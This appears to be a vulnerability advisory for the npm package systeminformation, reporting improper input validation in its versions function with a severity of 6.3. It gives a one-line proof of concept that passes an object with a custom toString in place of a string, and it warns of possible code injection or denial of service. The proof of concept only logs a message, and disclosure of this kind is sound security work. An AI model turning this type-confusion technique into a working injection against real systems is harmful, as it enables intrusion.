systeminformation

vulnerability improper input validation
severity 6.3
language javascript
registry npm

✍️ Description

The systeminformation package is vulnerable to Improper Input Validation through versions function.

🕵️‍♂️ Proof of Concept

// PoC.js

const si = require('systeminformation');
si.versions({toString : () => { console.log("This is a PoC") }});

💥 Impact

This vulnerability allows attackers to send an object instead of a string, which may lead to Code injection, DoS, etc.

References